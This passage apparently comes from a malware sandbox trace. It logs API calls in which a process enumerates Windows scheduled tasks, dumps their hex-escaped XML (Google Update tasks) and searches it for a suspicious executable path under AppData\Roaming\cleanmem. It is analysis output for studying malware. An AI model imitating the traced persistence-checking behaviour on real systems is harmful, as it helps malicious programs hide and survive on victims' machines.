20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0 [0138.617] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.617] IUnknown:Release (This=0x126bc0) returned 0x0 [0138.617] IRegisteredTaskCollection:get_Item (in: This=0x126b00, index=0x24df60*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000004, varVal2=0x449cf8), ppRegisteredTask=0x24df10 | out: ppRegisteredTask=0x24df10*=0x126bc0) returned 0x0 [0138.617] IRegisteredTask:get_Name (in: This=0x126bc0, pName=0x24df30 | out: pName=0x24df30*="GoogleUpdateTaskMachineUA") returned 0x0 [0138.617] IRegisteredTask:get_Xml (in: This=0x126bc0, pXml=0x24df18 | out: pXml=0x24df18*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x39\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0 [0138.620] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\